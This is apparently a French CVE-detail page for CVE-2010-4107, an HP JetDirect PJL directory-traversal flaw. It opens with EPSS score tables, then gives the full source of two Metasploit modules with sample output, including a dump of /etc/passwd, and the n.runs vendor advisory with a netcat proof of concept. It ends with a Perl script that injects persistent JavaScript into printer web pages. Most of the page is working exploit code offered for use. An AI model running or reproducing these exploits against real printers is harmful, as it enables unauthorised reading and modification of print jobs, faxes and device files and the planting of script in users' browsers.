CVE-2010-4107 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	11%	–	–
2022-04-03	–	–	11%	–	–
2022-05-22	–	–	11%	–	–
2023-03-12	–	–	–	10.54%	–
2023-08-27	–	–	–	7.37%	–
2023-12-10	–	–	–	6.54%	–
2024-02-25	–	–	–	6.54%	–
2024-03-03	–	–	–	8.97%	–
2024-04-21	–	–	–	8.97%	–
2024-06-02	–	–	–	8.97%	–
2024-06-02	–	–	–	8.97%	–
2024-10-06	–	–	–	5.66%	–
2024-11-03	–	–	–	5.66%	–
2024-12-22	–	–	–	8.08%	–
2025-01-05	–	–	–	10.45%	–
2025-01-19	–	–	–	10.45%	–
2025-03-18	–	–	–	–	21.37%
2025-03-30	–	–	–	–	29.97%
2025-03-30	–	–	–	–	29.97,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	89%
2022-04-03	94%
2022-05-22	95%
2023-03-12	94%
2023-08-27	93%
2023-12-10	93%
2024-02-25	94%
2024-03-03	94%
2024-04-21	95%
2024-06-02	95%
2024-06-02	95%
2024-10-06	93%
2024-11-03	94%
2024-12-22	94%
2025-01-05	95%
2025-01-19	95%
2025-03-18	95%
2025-03-30	96%
2025-03-30	96%

# Exploit Title: HP JetDirect PJL Interface Universal Path Traversal # Date: Aug 7, 2011 # Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/> # Software Link: http://www.hp.com # Version: All # Tested on: HP LaserJet Pxxxx Series ## # $Id: $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # Sample Output: # # # msf auxiliary(hp_printer_pjl_traversal) > show options # # Module options (auxiliary/admin/hp_printer_pjl_traversal): # # Name Current Setting Required Description # ---- --------------- -------- ----------- # INTERACTIVE false no Enter interactive mode [msfconsole Only] # RHOST 202.138.16.21 yes The target address # RPATH / yes The remote filesystem path to browse or read # RPORT 9100 yes The target port # # # msf auxiliary(hp_printer_pjl_traversal) > run # # [*] cd / ... # [+] Server returned the following response: # # . TYPE=DIR # .. TYPE=DIR # bin TYPE=DIR # usr TYPE=DIR # etc TYPE=DIR # hpmnt TYPE=DIR # hp TYPE=DIR # lib TYPE=DIR # dev TYPE=DIR # init TYPE=FILE SIZE=9016 # .profile TYPE=FILE SIZE=834 # tmp TYPE=DIR # # # msf auxiliary(hp_printer_pjl_traversal) > set INTERACTIVE true # INTERACTIVE => true # msf auxiliary(hp_printer_pjl_traversal) > set RPATH /hp # RPATH => /hp # msf auxiliary(hp_printer_pjl_traversal) > run # # [*] Entering interactive mode ... # [*] cd /hp ... # [+] Server returned the following response: # # . TYPE=DIR # .. TYPE=DIR # app TYPE=DIR # lib TYPE=DIR # bin TYPE=DIR # webServer TYPE=DIR # images TYPE=DIR # DemoPage TYPE=DIR # loc TYPE=DIR # AsianFonts TYPE=DIR # data TYPE=DIR # etc TYPE=DIR # lrt TYPE=DIR # # [*] Current RPATH: /hp # [*] -> 'quit' to exit # [*] ->'/' to return to file system root # [*] ->'..' to move up to one directory # [*] ->'!r FILE' to read FILE on current directory # # [*] Enter RPATH: # $ > webServer/config # [*] cd /hp/webServer/config ... # [+] Server returned the following response: # # . TYPE=DIR # .. TYPE=DIR # soe.xml TYPE=FILE SIZE=23615 # version.6 TYPE=FILE SIZE=45 # # # [*] Current RPATH: /hp/webServer/config # [*] -> 'quit' to exit # [*] ->'/' to return to file system root # [*] ->'..' to move up to one directory # [*] ->'!r FILE' to read FILE on current directory # # [*] Enter RPATH: # $ > !r version.6 # [*] cat /hp/webServer/config/version.6 ... # [+] Server returned the following response: # # WebServer directory version. Do not delete! # # # [*] Current RPATH: /hp/webServer/config # [*] -> 'quit' to exit # [*] ->'/' to return to file system root # [*] ->'..' to move up to one directory # [*] ->'!r FILE' to read FILE on current directory # # [*] Enter RPATH: # $ > quit # [*] Exited ... Have fun with your Printer! # [*] Auxiliary module execution completed require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info={}) super(update_info(info, 'Name' => 'HP JetDirect PJL Interface Universal Path Traversal', 'Version' => '$Revision: 1 $', 'Description' => %q{ This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100. With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified. }, 'Author' => [ 'Moritz Jodeit <http://www.nruns.com/>', # Bug Discoverer 'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2010-4107' ], [ 'URL', 'http://www.nruns.com/_downloads/SA-2010%20003-Hewlett-Packard.pdf' ], [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02004333' ], [ 'URL', 'http://www.irongeek.com/i.php?page=security/networkprinterhacking' ], [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-laserjet-printer.rb' ], [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-OfficeJet-Printer.rb' ], [ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ] ], 'DisclosureDate' => '2010-11-15')) register_options( [ OptString.new('RPATH', [ true, "The remote filesystem path to browse or read", "/" ] ), OptBool.new('INTERACTIVE', [ false, "Enter interactive mode [msfconsole Only]", false ] ), Opt::RPORT(9100) ],self.class) end def run mode = datastore['INTERACTIVE'] if mode == true set_interactive(datastore['RPATH']) else set_onetime(datastore['RPATH']) end end def set_interactive(spath) action = 'DIR' rpath = spath rfpath = '' tmp_path = '' tmp_file = '' cur_dir = '/' print_status("Entering interactive mode") stop = false set_onetime(rpath) until stop == true print_status("Current RPATH: #{rpath}") print_status("-> 'quit' to exit") print_status("->'/' to return to file system root") print_status("->'..' to move up to one directory") print_status("->'!r FILE' to read FILE on current directory\r\n") print_status("Enter RPATH:") print("$ > ") tmp_path = gets.chomp.to_s if tmp_path =~ /\.\./ && rpath.length > 2 old_path = rpath new_path = rpath[0,rpath.rindex('/')] if new_path != nil rpath = new_path else rpath = '/' end rpath = '/' if rpath.length == 0 print_status("Change to one up directory: #{rpath}") elsif tmp_path =~ /\!r\s/ cur_dir = rpath tmp_file = tmp_path.gsub('!r ','') rfpath = cur_dir + '/' + tmp_file rfpath = rfpath.gsub('//','/') action = 'FILE' elsif tmp_path == '/' rpath = '/' elsif rpath != '/' rpath = rpath + '/' << tmp_path else rpath = rpath << tmp_path end if rpath =~ /quit/ stop= true rpath = '/' print_status("Exited ... Have fun with your Printer!") else rpath = rpath.gsub('//','/') if action == 'FILE' set_onetime(rfpath,action) cur_dir = rpath else set_onetime(rpath,action) end action = 'DIR' end end end def set_onetime(spath,saction = datastore['ACTION']) rpathx = spath action = saction rpathx = '/' if rpathx =~ /\/quit/ connect dir_cmd = "\x1b%-12345X@PJL FSDIRLIST NAME=\"0:/../../../[REPLACE]\" ENTRY=1 COUNT=99999999\x0d\x0a\x1b%-12345X\x0d\x0a" file_cmd = "\x1b%-12345X@PJL FSUPLOAD NAME=\"0:/../../../[REPLACE]\" OFFSET=0 SIZE=99999999\x0d\x0a\x1b%-12345X\x0d\x0a" if action =~ /DIR/ r_cmd = dir_cmd.sub("[REPLACE]",rpathx) print_status("cd #{rpathx} ...") else r_cmd = file_cmd.sub("[REPLACE]",rpathx) print_status("cat #{rpathx} ...") end recv = sock.put(r_cmd) res = sock.get(-1,1) if (!res) print_error("ERROR in receiving data!\r\n") else if res.to_s =~ /ERROR/ print_error("Operation Not Permitted or File/DIR Not Found!\r\n") disconnect return end resx = res.to_s[res.index("\r\n")+1,res.length] print_good("Server returned the following response:\r\n#{resx}") end disconnect end end

# Exploit Title: HP JetDirect PJL Query Execution # Date: Aug 7, 2011 # Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/> # Software Link: http://www.hp.com # Version: All # Tested on: HP LaserJet Pxxxx Series ## # $Id: $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # Sample Output: # # # msf auxiliary(hp_printer_pjl_cmd) > show options # # Module options (auxiliary/admin/hp_printer_pjl_cmd): # # Name Current Setting Required Description # ---- --------------- -------- ----------- # CMD FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=999 yes PJL Command to run # INTERACTIVE true no Enter interactive mode [msfconsole Only] # RHOST 202.138.16.21 yes The target address # RPORT 9100 yes The target port # # msf auxiliary(hp_printer_pjl_cmd) > run # # [*] Entering interactive mode ... # [*] Please wait while executing - # [*] FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=999 # [+] Server returned the following response: # # root::0:0::/:/bin/dlsh # # # [*] Enter PJL Command: # [*] -> 'quit' to exit # $ > fsdirlist name="0:/../../../" entry=1 count=99999999 # [*] Please wait while executing - # [*] fsdirlist name="0:/../../../" entry=1 count=99999999 # [+] Server returned the following response: # # . TYPE=DIR # .. TYPE=DIR # bin TYPE=DIR # usr TYPE=DIR # etc TYPE=DIR # hpmnt TYPE=DIR # hp TYPE=DIR # lib TYPE=DIR # dev TYPE=DIR # init TYPE=FILE SIZE=9016 # .profile TYPE=FILE SIZE=834 # tmp TYPE=DIR # # # [*] Enter PJL Command: # [*] -> 'quit' to exit # $ > quit # [*] Exited ... Have fun with your Printer! # [*] Auxiliary module execution completed # msf auxiliary(hp_printer_pjl_cmd) > require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info={}) super(update_info(info, 'Name' => 'HP JetDirect Printer PJL Query Execution', 'Version' => '$Revision: 1 $', 'Description' => %q{ This module act as a HP printer PJL (Printer Job Language) query tool that allows you to submit your own PJL commands. Valid PJL commands are required to get successful response. See the reference section for PJL reference guides from HP. }, 'Author' => [ 'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13208/bpl13208.pdf' ], [ 'URL', 'http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13207/bpl13207.pdf' ], [ 'URL', 'https://secure.wikimedia.org/wikipedia/en/wiki/Printer_Job_Language' ], [ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ] ], 'DisclosureDate' => ' 2011')) register_options( [ OptString.new('CMD', [ true, "PJL Command to run", 'FSUPLOAD NAME="0:/../../../.profile" OFFSET=0 SIZE=999' ] ), OptBool.new('INTERACTIVE', [ false, "Enter interactive mode [msfconsole Only]", false ] ), Opt::RPORT(9100) ],self.class) end def run mode = datastore['INTERACTIVE'] if mode == true set_interactive(datastore['CMD']) else set_onetime(datastore['CMD']) end end def set_interactive(scmd) cmd = scmd print_status("Entering interactive mode ...") stop = false set_onetime(cmd) until stop == true print_status("Enter PJL Command:") print_status("-> 'quit' to exit") print("$ > ") tmp_cmd = '' tmp_cmd = gets.chomp.to_s if tmp_cmd =~ /quit/ stop= true print_status("Exited ... Have fun with your Printer!") else set_onetime(tmp_cmd) end end end def set_onetime(scmd) connect cmd = "\x1b%-12345X@PJL [REPLACE]\x0d\x0a\x1b%-12345X\x0d\x0a" r_cmd = cmd.sub("[REPLACE]",scmd) print_status("Please wait while executing -") print_status("#{scmd}") recv = sock.put(r_cmd) res = sock.get(-1,1) if (!res) print_error("ERROR in receiving data!\r\n") else if res.to_s =~ /ERROR/ print_error("BAD COMMAND OR ERROR\r\n") disconnect return end resx = res.to_s[res.index("\r\n")+1,res.length] print_good("Server returned the following response:\r\n#{resx}") end disconnect end end

n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2010.003 16-Nov-2010 ________________________________________________________________________ Vendor: Hewlett-Packard, http://www.hp.com Affected Products: Various HP LaserJet MFP devices (See HP advisory [3] for the complete list) Vulnerability: Directory Traversal in PJL interface Risk: HIGH ________________________________________________________________________ Vendor communication: 2009/11/25 Initial notification of Hewlett-Packard 2009/11/25 HP confirms receival of advisory 2010/02/05 n.runs AG requests update on the reported issue 2010/02/05 HP notifies n.runs AG that an advisory is in preparation 2010/11/15 Publication of HP advisory ________________________________________________________________________ Overview: The Printer Job Language (PJL) was developed by Hewlett-Packard to provide a method for switching printer languages at the job level and for status exchange between the device and a host computer. Besides the possibility to view and change parts of the printer's configuration or modify control panel messages PJL allows some limited form of file system access. PJL is used "above" other printer languages such as PCL and is usually accessible on port 9100. Detailed information about PJL can be found in the PJL Technical Reference Manual [1]. Description: A directory traversal vulnerability has been found in the PJL file system access interface of various HP LaserJet MFP devices. File system access through PJL is usually restricted to a specific part of the file system. Using a pathname such as 0:\..\..\..\ it is possible to get access to the complete file system of the device. Proof of Concept: The following command can be used to reproduce the problem. It lists all files in the root directoy of the device: $ python -c 'print "\x1b%-12345X () PJL FSDIRLIST NAME=\"0:\\..\\..\\..\\\" \ ENTRY=1 COUNT=999999\x0d\x0a\x1b%-12345X\x0d\x0a"' | nc 192.168.0.1 9100 @PJL FSDIRLIST NAME="0:\..\..\..\" ENTRY=1 . TYPE=DIR .. TYPE=DIR tmp TYPE=DIR etc TYPE=DIR xps TYPE=DIR dsk_ide2a TYPE=DIR dsk_ColorIQ TYPE=DIR dsk_CustomIQ TYPE=DIR bootdev TYPE=DIR dsk_jdi TYPE=DIR dsk_jdi_ss TYPE=DIR dsk_af TYPE=DIR lrt TYPE=DIR webServer TYPE=DIR Impact: This vulnerability allows sensitive information to be disclosed and potentially be modified. This includes spooled print jobs, received faxes, log files or other settings of the device. Solution: See the HP advisory [3] for possible workarounds. ________________________________________________________________________ Credit: Bug found by Moritz Jodeit of n.runs AG. ________________________________________________________________________ References: [1] http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13208/bpl13208.pd f [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4107 [3] http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c0200 4333 This Advisory and Upcoming Advisories: http://www.nruns.com/security_advisory.php ________________________________________________________________________ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact security () nruns com for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2010 n.runs AG. All rights reserved. Terms of use apply.

#!/usr/bin/perl use strict; use warnings; use IO::Socket::INET; my $host = $ARGV[0]; # Exploit Title: HP Laser Jet Persistent Javascript Cross Site Scripting via PJL # Google Dork: n/a # Date: 4/22/14 # Exploit Author: @0x00string # Vendor Homepage: http://www.hp.com/products1/laserjetprinters/ # Software Link: n/a # Version: HP LaserJet P/M xxxx (LaserJets with network conectivity, PJL and onboard storage) # Tested on: P4015n, P2035n, P4014, M3035 MFP, CP 3525, etc. # CVE : CVE-2010-4107, # This script will infect all pages on HP laserjets which include ews_functions.js by appending javascript to the ews_functions.js file by leveraging the PJL Directory Traversal print "\t _______ __ __ _______ _______ _______ _______ ______ ___ __ _ _______ \t| _ || |_| || _ || _ || || || _ | | | | | | || | \t| | | || || | | || | | || _____||_ _|| | || | | | |_| || ___| \t| | | || || | | || | | || |_____ | | | |_||_ | | | || | __ \t| |_| | | | | |_| || |_| ||_____ | | | | __ || | | _ || || | \t| || _ || || | _____| | | | | | | || | | | | || |_| | \t|_______||__| |__||_______||_______||_______| |___| |___| |_||___| |_| |__||_______| \t HP Laser Jet persistent Javascript XSS \t via PJL Dir Trav\n\n"; $| = 1; infect($host); sub infect { my $co = 0; my (@returned, $temp, @files, @sizes, $size, $data); my $socket = new IO::Socket::INET ( PeerHost => $host, PeerPort => '9100', Proto => 'tcp', ) or die $!; if ($socket) { $data = "\x1b\x25\x2d\x31\x32". "\x33\x34\x35\x58\x40". "\x50\x4a\x4c\x20\x46". "\x53\x44\x49\x52\x4c". "\x49\x53\x54\x20\x4e". "\x41\x4d\x45\x20\x3d". "\x20\x22\x30\x3a\x5c". "\x5c\x77\x65\x62\x53". "\x65\x72\x76\x65\x72". "\x5c\x5c\x68\x6f\x6d". "\x65\x5c\x5c\x6a\x73". "\x66\x69\x6c\x65\x73". "\x5c\x5c\x22\x20\x45". "\x4e\x54\x52\x59\x3d". "\x31\x20\x43\x4f\x55". "\x4e\x54\x3d\x39\x39". "\x39\x0a\x0d\x1b\x25". "\x2d\x31\x32\x33\x34\x35\x58"; #print "\n$data\n"; $socket = tx($socket, $data); ($socket, $temp) = rx($socket); #print "\n$temp\n"; @returned = split('\n', $temp); foreach(@returned) { if ($_ =~ /(.*?)\ TYPE\=FILE\ SIZE\=(\d{1,99})/) { push(@files, $1); push(@sizes, $2); } } } my $two = 0; foreach(@files) { if ($_ =~ /RestrictColor\.js/ || $_ =~ /ews_functions\.js/) { $two++; } } if ($two > 1) { if ($socket) { while ($co < scalar(@files)) { if ($files[$co] =~ /ews/) { $size = $sizes[$co]; $data = "\x1b\x25\x2d\x31\x32\x33\x34\x35\x58". "\x40\x50\x4a\x4c\x20\x46\x53\x55\x50". "\x4c\x4f\x41\x44\x20\x4e\x41\x4d\x45". "\x20\x3d\x20\x22\x30\x3a\x5c\x5c\x77". "\x65\x62\x53\x65\x72\x76\x65\x72\x5c". "\x5c\x68\x6f\x6d\x65\x5c\x5c\x6a\x73". "\x66\x69\x6c\x65\x73\x5c\x5c\x65\x77". "\x73\x5f\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x73\x2e\x6a\x73\x22\x20\x4f\x46". "\x46\x53\x45\x54\x3d\x30\x20\x53\x49". "\x5a\x45\x20\x3d\x20" . $size. "\x0d\x0a"; } $co++; } $temp = undef; #print "\n$data\n"; $socket = tx($socket, $data); $data = undef; if ($socket) { ($socket, $temp) = rx($socket, $size); #print "\n$temp\n"; my @original = split('\n', $temp); $temp = ""; shift(@original); foreach(@original) { $temp = $temp . $_ . "\n"; } #print $temp; } } } $data = "\x1b\x25\x2d\x31\x32\x33\x34\x35\x58". "\x40\x50\x4a\x4c\x20\x46\x53\x41\x50". "\x50\x45\x4e\x44\x20\x46\x4f\x52\x4d". "\x41\x54\x3a\x42\x49\x4e\x41\x52\x59". "\x20\x4e\x41\x4d\x45". "\x20\x3d\x20\x22\x30\x3a\x5c\x5c\x77". "\x65\x62\x53\x65\x72\x76\x65\x72\x5c". "\x5c\x68\x6f\x6d\x65\x5c\x5c\x6a\x73". "\x66\x69\x6c\x65\x73\x5c\x5c\x65\x77". "\x73\x5f\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x73\x2e\x42\x41\x4b". "\x22\x20\x53\x49\x5a\x45\x20\x3d\x20". length($temp) . "\x0d\x0a". $temp. "\x1b\x25\x2d\x31\x32\x33\x34\x35\x58"; #print $data; if ($socket) { #print "\n$data\n"; $socket = tx($socket, $data); ($socket, $temp) = rx($socket); #print "\n$temp\n"; } if ($socket) { $data = "\x1b\x25\x2d\x31\x32\x33\x34\x35\x58". "\x40\x50\x4a\x4c\x20\x46\x53\x51\x55". "\x45\x52\x59\x20\x4e\x41\x4d\x45\x20". "\x3d\x20\x22\x30\x3a\x5c\x5c\x77\x65". "\x62\x53\x65\x72\x76\x65\x72\x5c\x5c". "\x68\x6f\x6d\x65\x5c\x5c\x6a\x73\x66". "\x69\x6c\x65\x73\x5c\x5c\x65\x77\x73". "\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e". "\x73\x2e\x42\x41\x4b\x22\x0d\x0a"; #print "\n$data\n"; $socket = tx($socket, $data); ($socket, $temp) = rx($socket); #print "\n$temp\n"; exit(0) unless ($temp =~ /ews\_functions\.BAK/); } if ($socket) { my $payload = "\x76\x61\x72\x20\x65\x78\x70\x6c\x6f". "\x69\x74\x20\x3d\x20\x64\x6f\x63\x75". "\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61". "\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74". "\x28\x22\x64\x69\x76\x22\x29\x3b\x20". "\x65\x78\x70\x6c\x6f\x69\x74\x2e\x69". "\x6e\x6e\x65\x72\x48\x54\x4d\x4c\x20". "\x3d\x20\x27\x3c\x64\x69\x76\x3e\x3c". "\x66\x6f\x6e\x74\x20\x73\x69\x7a\x65". "\x3d\x35\x30\x3e". "\x41\x41\x41\x41" . "\x3c". # <--- this is being added to the page as an element. put whatever you'd like here, but check your lengths! "\x2f\x66\x6f\x6e\x74\x3e\x3c\x2f\x64". "\x69\x76\x3e\x27\x3b\x20\x64\x6f\x63". "\x75\x6d\x65\x6e\x74\x2e\x67\x65\x74". "\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42". "\x79\x54\x61\x67\x4e\x61\x6d\x65\x28". "\x27\x62\x6f\x64\x79\x27\x29\x5b\x30". "\x5d\x2e\x61\x70\x70\x65\x6e\x64\x43". "\x68\x69\x6c\x64\x28\x65\x78\x70\x6c". "\x6f\x69\x74\x29\x3b"; $data = "\x1b\x25\x2d\x31\x32\x33\x34\x35\x58". "\x40\x50\x4a\x4c\x20\x46\x53\x41\x50". "\x50\x45\x4e\x44\x20\x46\x4f\x52\x4d". "\x41\x54\x3a\x42\x49\x4e\x41\x52\x59". "\x20\x4e\x41\x4d\x45\x20\x3d\x22\x30". "\x3a\x5c\x5c\x77\x65\x62\x53\x65\x72". "\x76\x65\x72\x5c\x5c\x68\x6f\x6d\x65". "\x5c\x5c\x6a\x73\x66\x69\x6c\x65\x73". "\x5c\x5c\x65\x77\x73\x5f\x66\x75\x6e". "\x63\x74\x69\x6f\x6e\x73\x2e\x6a\x73". "\x22\x20\x53\x49\x5a\x45\x20\x3d\x20". length($payload) . "\x0d\x0a". $payload. "\x1b\x25\x2d\x31\x32\x33\x34\x35\x58"; $socket = tx($socket, $data); exit(0); } } sub tx { my $socket = shift; my $data = shift; $socket->send($data) or die $!; return $socket; } sub rx { my $socket = shift; my $second_size = shift; unless ($second_size) { $second_size = 2048; } my $data = undef; eval { local $SIG{ALRM} = sub { die 'Timed Out'; }; alarm 10; $socket->recv($data, 2048); if ($data) { while (length($data) < (length($data) + $second_size)) { my $moar; $socket->recv($moar, length($second_size + 1)); $data = $data . $moar; } alarm 0; return ($socket, $data); } }; alarm 0; return($socket, $data); }